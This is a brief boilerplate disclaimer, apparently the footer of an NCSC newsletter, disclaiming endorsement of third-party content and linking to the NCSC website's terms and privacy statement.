Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.